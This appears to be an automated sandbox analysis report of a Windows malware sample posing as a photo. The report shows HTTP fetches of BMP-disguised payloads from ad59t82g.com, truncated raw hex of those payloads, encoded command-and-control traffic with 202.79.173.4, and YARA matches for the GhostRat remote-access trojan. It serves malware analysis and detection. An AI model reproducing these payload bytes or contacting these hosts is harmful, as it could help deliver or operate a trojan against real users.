                                                              Sep 20, 2024 12:00:12.456240892 CEST112OUTGET /1/d.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:12.562527895 CEST1236INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:12 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 1236598
                                                              Connection: keep-alive
                                                              Last-Modified: Tue, 03 Sep 2024 17:12:42 GMT
                                                              ETag: "66d7438a-12de76"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: HIT
                                                              Age: 0
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxnACs4o1%2BSkg0PuilgcZ9kQxOWMx9dXbggEzkU2IumqaEkIlXfY5XF6HE3snr2vmtJD72UJa1Afc7JazCR114vD4kspdpG2rR2CM3viXYCsuoBR1WhNxTCooAxvmGo%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f796282b72bc-EWR
                                                              Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 97 08 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 88 c4 41 de e9 aa 12 de e9 aa 12 de e9 aa 12 b1 9f 34 12 ea e9 aa 12 b1 9f 00 12 46 e9 aa 12 b1 9f 01 12 f1 e9 aa 12 d7 91 29 12 dd e9 aa 12 d7 91 39 12 cf e9 aa 12 de e9 ab 12 04 e9 aa 12 b1 9f 05 12 ff e9 aa 12 b1 9f 31 12 df e9 aa 12 b1 9f 30 12 df e9 aa 12 b1 9f 37 12 df e9 aa 12 35 61 63 68 de e9 aa 12 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 ad 48 d7 66 67 08 00 00 67 08 00 00 87 08 02 21 6c 09 0a 00 67 b6 0a 00 67 38 09 00 67 08 00 00 43 55 08 00 [TRUNCATED]
                                                              Data Ascii: BMv6(,, @*Rdcg'ggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICgA4F)91075achgg7M+Hfgg!lgg8gCUgggggbgbgg8gge@gggggwA>g8?gggggHgggggggg? 'gggggggggI|exFggggggG
                                                              Sep 20, 2024 12:00:14.482770920 CEST114OUTHEAD /1/t2.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:14.856868982 CEST654INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:14 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 2473
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 12 Sep 2024 12:10:26 GMT
                                                              ETag: "66e2da32-9a9"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: MISS
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqhdymGHx%2FjlOS3%2BIBxd8%2B9YsawPM2p4mLH2yO5SdouJVoDkwNLwAVpk4xXf8UKvTmJPtO9zgYpUZUR%2B8ArLAeb2R52aEdt%2FIuDNzl%2B3LK%2Bcrnmx1FwT8d069ZOx178%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f7a2df7a72bc-EWR
                                                              Sep 20, 2024 12:00:14.857656002 CEST113OUTGET /1/t2.bmp HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: Keep-Alive
                                                              Pragma: no-cache
                                                              Host: ad59t82g.com
                                                              Sep 20, 2024 12:00:14.963140965 CEST1236INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Sep 2024 10:00:14 GMT
                                                              Content-Type: image/x-ms-bmp
                                                              Content-Length: 2473
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 12 Sep 2024 12:10:26 GMT
                                                              ETag: "66e2da32-9a9"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: HIT
                                                              Age: 0
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6i4hY2JCOEPF4RsMuUwH%2BdkNWe0ITkm0gjDJC5pa8nbpM1AO6hnajezwH%2FFdis1BDnqcaBanZevA5Z%2B8t2ycqAMz%2FXgwgpC4t2LiP%2Fotl2m1dK06XqyGxHHG5ojQPfA%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c60f7a528f372bc-EWR
                                                              Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 83 ec 83 83 f0 81 ec 73 0a 00 00 03 a9 30 00 67 08 53 33 bc 81 5c 24 3b 81 5c 24 17 81 5c 24 13 81 5c 24 1f 83 40 0c ec 48 14 56 30 e3 42 0f d0 40 24 8b 37 20 d1 e9 54 f7 3b cb 19 17 0f b7 55 8b c2 02 e4 f6 61 72 61 89 c6 e0 98 08 00 69 98 29 05 00 67 07 b7 f6 64 f6 49 75 86 89 e7 ff 98 f7 7f 81 98 d8 d1 91 08 07 84 ec 67 08 00 8b 67 33 c3 75 dd 3b f6 53 0f 52 3c 94 24 e0 bf 06 67 08 50 68 11 4f cc 69 ee 4c 24 30 8f b8 06 00 67 f7 74 24 57 81 44 24 5f 60 12 65 f4 4e e8 9e 61 08 00 ff 13 2c 38 89 23 2c 44 68 2e d2 de 2a 8f 84 06 00 67 f7 74 24 27 81 44 24 37 60 0f f5 21 02 e8 7a 61 08 00 89 23 2c 58 83 a3 20 8d 44 43 04 50 c7 23 2c 10 6e 13 6c 6c 66 a0 4c 24 14 0b 08 ff 54 43 20 ff 74 43 28 8b f0 0f 83 2b 8f 6e e0 4b 06 67 08 ff 74 43 20 89 44 43 48 68 e2 36 5e 66 e8 5e 0e 00 00 e4 cc 10 89 23 2c 38 e8 4e 0e 00 00 54 c1 80 3c 66 6b 75 31 [TRUNCATED]
                                                              Data Ascii: BM6(zy 2s0gS3\$;\$\$\$@HV0B@$7 T;Uarai)gdIugg3u;SR<$gPhOiL$0gt$WD$_`eNa,8#,Dh.*gt$'D$7`!za#,X DCP#,nllfL$TC tC(+nKgtC DCHh6^f^#,8NT<fku1t}*d+|feu{|ckut}d|fetqIoZgj'g81$x S\$8D$|$g(P3,<#,|(_XCgT$#D$b@Vx,S\$8D$|$g$P3,<#,|$HGD_XCgT$#D$H,d@ #,W:_#@8,gDCP#,3U&df


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549725202.79.173.4801492C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 20, 2024 12:00:33.252152920 CEST6OUTData Raw: 78 33 32 00
                                                              Data Ascii: x32
                                                              Sep 20, 2024 12:00:34.136702061 CEST1236INData Raw: 0e b0 04 00 00 00 00 00 00 00 00 00 00 00 c2 b9 2f 2b 2b 7e a0 c7 a8 c7 33 78 7d a0 5a 17 7c a2 7e df a0 6f 25 53 ae eb 5f 46 a8 57 25 57 2b 5f 4d a0 77 23 33 a2 76 d3 ae f0 5f 70 a0 7f 23 37 a0 5f 23 0b 28 fa a0 6f 23 0f 28 da a2 7e c3 28 ea 18
                                                              Data Ascii: /++~3x}Z|~o%S_FW%W+_Mw#3v_p#7_#(o#(~(^n_(V,_<B+++$(h(^vT^_:^iYtupvV#+^:n$/{~/(|z~#~zN+++++s;+nnv~zzO+++x}|k'{?j
                                                              Sep 20, 2024 12:00:34.136718988 CEST1236INData Raw: 11 41 2f 43 2b 3b 2b 2b d4 5d 2e 28 ed 78 a2 6e d3 d4 7e cf a0 f3 ae f0 5e 2f 18 eb c0 74 d4 5d 2e 78 d4 5d 22 7c d4 7e d3 a8 ef 3b a8 d3 d4 5f 0b 10 6d 2e 5e 30 a0 d0 18 f0 68 ab 15 2b a6 6e d7 7b a0 fc a6 66 f7 a6 6d 3a 5e 38 41 2b 7b c0 3a 43
                                                              Data Ascii: A/C+;++].(xn~^/t].x]"|~;_m.^0h+n{fm:^8A+{:C+k++].x~{A+'_'C+k++].|~ntupv*+++++*++*+^+++GDJO++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                                              Sep 20, 2024 12:00:34.136727095 CEST448INData Raw: 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 7e a0 c7 7d a0 da a0 6d 2f ec 2d 37 5f 2a 3b ae eb 5f 25 43 2b ab 2b 2b 41 2b 7b d4 3e e3 7b 2a 3b dd 6e 23 2a 5f 22 7d c3 c6 73 2b 2b
                                                              Data Ascii: +++++++++++++++++++++++++++++++++++++~}m/-7_*;_%C+++A+{>{*;n#*_"}s++/uv/+*7_*;b/_%C+++A+z>{*;~}e/|V'^/.m#(T+++n#e#|{z*++'V;+_f#U`x}#n?:~#$/))++n#<(/
                                                              Sep 20, 2024 12:00:34.136735916 CEST1236INData Raw: 28 f3 a2 6d 2f a2 55 27 a0 ec 74 a2 75 23 70 a0 ce 76 e8 e7 e7 7e a0 c7 a0 65 2f a8 c7 27 ae e2 5f 24 a0 6d 23 00 ea 10 fb 58 2d 18 eb a0 ce 76 e8 a2 7e d3 f0 6e d3 7c ae f9 52 2d f7 2e f3 5d 2a 3b f7 26 fb 5d 2a 3b a8 c7 23 f6 37 0f c3 e9 71 2b
                                                              Data Ascii: (m/U'tu#pv~e/'_$m#X-v~n|R-.]*;&]*;#7q++V#$n&+'++nFVV!FU'X,tvxA/C+;++|A+>{*;e/n^/.u#xz{b++m/'C+++A+{>{*;n(u#m/pU'tv~zCV*;fz
                                                              Sep 20, 2024 12:00:34.136745930 CEST1236INData Raw: a0 ce 76 e8 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ae a3 e3 2b 2b 2b 5f 24 a8 93 fb 2b 2b 2b 2b 5f 2d 93 2a 2b 2b 2b e8 18 eb e8 e7 e7 e7 e7 e7 e7 7e a0 c7 78 a0 36 bb 97 2a 3b 7d 7c 18 d4 43 ff 2b 2b 2b 10 f4 5f 21 d4 f8 a0 36 bb 97 2a 3b c0 2e
                                                              Data Ascii: v+++_$++++_-*+++~x6*;}|C+++_!6*;.s++/$+++n#f'-++++++U;U?U3U7UU_USm+++mmkUo+++Ucm/S.++m#K.+++++C;++_/.rs++/+++^*;}_'/tupv|++
                                                              Sep 20, 2024 12:00:34.136755943 CEST1236INData Raw: bd bb 2b 2b 2b 2a 55 77 a2 7b 2f a6 bd a7 2b 2b 2b a2 3b a0 bd bb 2b 2b 2b a2 29 a2 ad bb 2b 2b 2b 93 2a 2b 2b 2b 2a 6d 4f 2a 6d 33 10 22 5e 8a a0 6d 4f 10 6d 17 58 21 a8 56 d7 2b 5f 2f a8 65 63 29 a0 6e 27 74 75 70 a0 ce 76 e8 e7 7e a0 c7 a0 66
                                                              Data Ascii: +++*Uw{/+++;+++)+++*+++*mO*m3"^mOmX!V+_/ec)n'tupv~f''R,v++++x}$+++++++$++++++}l#$+++fW(nn&*;o){_/.x++/$*+++++`/+++(+++1+++m{ezxy|
                                                              Sep 20, 2024 12:00:34.136765957 CEST1236INData Raw: a0 a5 8f 2b 2b 2b a0 7e 23 a6 2f ea a0 66 27 a2 3b a2 63 2f d4 ad 83 2b 2b 2b 76 e8 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 a0 6a 37 a0 7d 33 7c a0 d3 00 55 17 00 d1 24 a2 e0 2b 2b 2b 00 e9 24 a3 e8 2b 2b 2b a0 ad 8b 2b 2b 2b a6 95 b7 2b 2b 2b 78
                                                              Data Ascii: +++~#/f';c/+++vj7}3|U$+++$+++++++++x*+++_7s7z7_T,k/^*+++"j/323`/#*}w0*;z_/.e++*+++/_q,c7e3^{eOeXc#s/r/c/32+++++k/+++++++ewc/+++#+++
                                                              Sep 20, 2024 12:00:34.136778116 CEST1236INData Raw: a2 6e df c0 28 a2 7e df a0 6d 33 a2 6e eb a0 ad 83 2b 2b 2b 78 18 f0 a2 7e 97 a2 7e 93 a2 6e cb 10 e9 24 a5 89 2b 2b 2b a0 ec 00 6e d7 a6 63 33 a2 6e d3 10 65 2f 55 67 dd ad e3 2b 2b 2b 2a 5f 34 12 bd fb 2b 2b 2b 5f 3c a0 fb 79 43 1f 5f 2a 3b 41
                                                              Data Ascii: n(~m3n+++x~~n$+++nc3ne/Ug+++*_4+++_<yC_*;A*n'_6+++f~{+++}zy;V+++/#k/nn,MnMl/y+Ml-nl#d'ffd;|?h3v$u+++}k^pmS^?mg.s0++mSs0++m_meg
                                                              Sep 20, 2024 12:00:34.136791945 CEST1236INData Raw: 27 d4 d4 d4 d4 a0 30 a6 ad bf 2b 2b 2b 10 f3 24 ae 57 d5 d4 d4 00 56 d7 70 ae d4 55 11 dd ad e3 2b 2b 2b 2a 5f 32 a8 95 fb 2b 2b 2b 2b 5f 3b 7c 43 1f 5f 2a 3b 41 2a c3 3e c7 d4 d4 a8 ef 27 a0 ad 9b 2b 2b 2b a0 66 d7 a0 bd e7 2b 2b 2b 7b 7d 7c 7a
                                                              Data Ascii: '0+++$WVpU+++*_2++++_;|C_*;A*>'+++f+++{}|z;V+_m?m;m)X,m)+++m(n}#$mo+++V+_nm)X,m)+++e#*+++mo+++.*+++moX'}#mo+++tuvS[+cg^!k[*+++c


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.549726202.79.173.4801492C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 20, 2024 12:00:37.291074991 CEST16OUTData Raw: 10 00 00 00 13 52 3c 00 00 00 00 00 ca 00 3a 3e
                                                              Data Ascii: R<:>
                                                              Sep 20, 2024 12:00:38.175915003 CEST115INData Raw: 73 00 00 00 13 52 3c 00 00 00 00 00 ca 00 3a 5c 7d 03 2b 4e 2b 18 2b c7 2b 5a 7d 5e 2b 4e 2b 48 2b c5 2b 0d 7d 03 2b 1e 2b 49 2b c2 2b 58 7d 02 2b 4f 2b 4f 2b c6 2b 0e 7d 53 2b 49 2b 19 2b 93 2b 0d 7d 56 2b 1c 2b 18 2b 97 2b 0e 7d 03 2b 2b 2b 2b
                                                              Data Ascii: sR<:\}+N+++Z}^+N+H++}++I++X}+O+O++}S+I+++}V++++}++++++>}g++++++>}g++++++>}g++++++
                                                              Sep 20, 2024 12:00:38.179241896 CEST2643OUTData Raw: 53 0a 00 00 13 52 3c 00 00 00 00 00 ca 00 3b 3e 7d 67 2b 50 5d 7e 74 d4 41 69 2a 49 2b 4f 2b 47 2b 99 2b 61 7d 05 2b 42 2b 45 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b
                                                              Data Ascii: SR<;>}g+P]~tAi*I+O+G++a}+B+E++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g+++++
                                                              Sep 20, 2024 12:00:38.494628906 CEST1236INData Raw: 12 4a 04 00 13 52 3c 00 00 00 00 00 ca 00 3f 3e 7d 67 2b 50 5d 7e 74 d4 41 69 2a 49 2b 4f 2b 47 2b 99 2b 61 7d 05 2b 42 2b 45 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b
                                                              Data Ascii: JR<?>}g+P]~tAi*I+O+G++a}+B+E++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g+++++
                                                              Sep 20, 2024 12:00:38.495687008 CEST224INData Raw: 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67
                                                              Data Ascii: }g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++
                                                              Sep 20, 2024 12:00:38.496098042 CEST1236INData Raw: 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b 2b f5 2b 3e 7d 67 2b 2b 2b 2b
                                                              Data Ascii: ++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g+++++
                                                              Sep 20, 2024 12:00:38.498300076 CEST1236INData Raw: 5d 64 fa a0 6f 23 0f f6 da b7 28 8f 28 ea 18 f9 a2 80 db b7 38 8b ae f0 5f 11 a0 c9 bd 0d 8b 64 d2 a2 56 d7 a1 f2 af fe 09 70 a0 f4 42 dd a8 f5 2b 3e 72 d9 eb 28 db 68 a1 f6 af fe 08 89 a0 76 d3 aa cd 0a d4 c1 02 5c 5e df 5f 3a a0 80 db 7c 46 b4
                                                              Data Ascii: ]do#((8_dVpB+>r(hv\^_:|FYtp:V#+:8$/{y(|ku~zvN}++++s.gnn ~zz}g+x}|'{?j$BYNQp@ch,T)v_b.++}g+$(=eKTt7$++o
                                                              Sep 20, 2024 12:00:38.498317957 CEST1236INData Raw: fc 78 66 e2 f0 21 3a 5e 38 41 2b a5 c0 2f 15 67 6b 2b 2b d4 5d f0 78 c1 28 8f c0 90 7b 41 2b 1d b5 c2 82 98 a8 ef 27 ae f0 81 27 56 7d 27 2b 2b d4 5d 2e a2 d4 6b 95 ec 6e d7 74 75 70 7e ce 63 be 67 2b 2b 2b 2b 2b cf 2f 3e 7d 5d 2f 2b 5e 2b 2b f5
                                                              Data Ascii: xf!:^8A+/gk++]x({A+''V}'++].kntup~cg+++++/>}]/+^++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g++++++>}g+++++fdg(+++/+>+++++>}gk+++++>}g++++++>}g++++++>}g+++++#
                                                              Sep 20, 2024 12:00:38.503135920 CEST1236INData Raw: 09 28 3b dd 6e fd 2a 4a 74 31 c3 48 bf 2a 2b 76 ef 3a f6 a1 75 76 e9 2f 2b 39 e7 f2 b1 ab e7 e7 e7 e7 ec f4 83 6c 7e 77 a0 62 2f ae e2 81 25 56 7d e7 2b 2b 41 2b 7a 0a 3e 1e 5f 64 3b e8 e7 e7 e7 39 7e b5 91 31 a0 db a0 65 2f a2 a0 43 71 e2 e2 5e
                                                              Data Ascii: (;n*Jt1H*+v:uv/+9l~wb/%V}++A+z>_d;9~1e/Cq^/.;o(+>}n#e#{o*+Cmg_#`x}#~n*[:~#$C/<)++{u7j(=^(|~6"'jW5*xu<tuv;*@utuv+9~'m'-v
                                                              Sep 20, 2024 12:00:38.503154039 CEST1236INData Raw: 6e c2 3d ee 6e d7 10 2c 59 43 a0 7b 85 39 70 a0 ce 76 e9 f1 2b 68 3b 31 78 d4 3e 7f 09 f6 3b f9 38 9f 2a 2b 2b 2b 75 ae a0 7b 85 ec ce 76 e9 2f 2b 39 e7 f2 b1 ab e7 e7 e7 e7 e7 39 e7 f2 28 ec c7 7a 78 a0 76 fd a8 45 79 67 5e 22 18 eb 70 7e ce 63
                                                              Data Ascii: n=n,YC{9pv+h;1x>;8*+++u{v/+99(zxvEyg^"p~co+++hWn#h"++++p@0uy/v1i|A+{~w_#h;1y>;8o`ontp:#+~}x+5>({qn*+>"nupvug9~~8


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.549727202.79.173.4801492C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 20, 2024 12:00:46.058562040 CEST4702OUTData Raw: 5e 12 00 00 13 5f 3c 00 00 00 00 00 ca 00 38 3e bb 67 12 2b 19 2b 05 f5 1a 3e bc 67 13 2b 05 2b 19 f5 05 3e bf 67 0b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b
                                                              Data Ascii: ^_<8>g++>g++>g+++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g+++++
                                                              Sep 20, 2024 12:00:46.597280025 CEST15INData Raw: 0f 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f4
                                                              Data Ascii: _<
                                                              Sep 20, 2024 12:00:46.598001957 CEST15OUTData Raw: 0f 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f5
                                                              Data Ascii: _<
                                                              Sep 20, 2024 12:00:57.398477077 CEST15OUTData Raw: 0f 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f7
                                                              Data Ascii: _<
                                                              Sep 20, 2024 12:00:57.713788033 CEST16INData Raw: 10 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f7 3e
                                                              Data Ascii: _<>
                                                              Sep 20, 2024 12:00:57.785392046 CEST574OUTData Raw: 3e 02 00 00 13 5f 3c 00 00 00 00 00 ca 00 3e 3e ba 67 0b 2b 46 2b 42 f5 45 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e da 67 59 2b 44 2b 4c f5 59 3e eb 67 46 2b 0b 2b 66 f5 4a 3e e4 67 4a 2b 4c 2b 4e f5 59 3e 8a 67 2b 2b 2b 2b
                                                              Data Ascii: >_<>>g+F+BE>g++++++>g++++++>gY+D+LY>gF++fJ>gJ+L+NY>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g+++++
                                                              Sep 20, 2024 12:01:13.929739952 CEST15OUTData Raw: 0f 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f7
                                                              Data Ascii: _<
                                                              Sep 20, 2024 12:01:14.244823933 CEST16INData Raw: 10 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f7 3e
                                                              Data Ascii: _<>
                                                              Sep 20, 2024 12:01:14.327188015 CEST574OUTData Raw: 3e 02 00 00 13 5f 3c 00 00 00 00 00 ca 00 3e 3e ba 67 0b 2b 46 2b 42 f5 45 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e 8a 67 2b 2b 2b 2b 2b f5 2b 3e da 67 59 2b 44 2b 4c f5 59 3e eb 67 46 2b 0b 2b 66 f5 4a 3e e4 67 4a 2b 4c 2b 4e f5 59 3e 8a 67 2b 2b 2b 2b
                                                              Data Ascii: >_<>>g+F+BE>g++++++>g++++++>gY+D+LY>gF++fJ>gJ+L+NY>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g++++++>g+++++
                                                              Sep 20, 2024 12:01:30.086055040 CEST15OUTData Raw: 0f 00 00 00 13 5f 3c 00 00 00 00 00 ca 00 f7
                                                              Data Ascii: _<


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:05:58:28
                                                              Start date:20/09/2024
                                                              Path:C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe"
                                                              Imagebase:0x400000
                                                              File size:2'957'312 bytes
                                                              MD5 hash:E054E331CAED0E50FC56F6B548FD10C5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:06:00:30
                                                              Start date:20/09/2024
                                                              Path:C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                                                              Imagebase:0x400000
                                                              File size:6'453'568 bytes
                                                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3859300120.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3697654357.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3913735905.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3913881702.0000000003EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3359487322.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3697596813.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3532200835.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3532247912.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3415028370.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3913806067.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3415028370.0000000005071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3914343860.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3378742070.0000000003C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3859358461.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:5
                                                              Start time:06:00:41
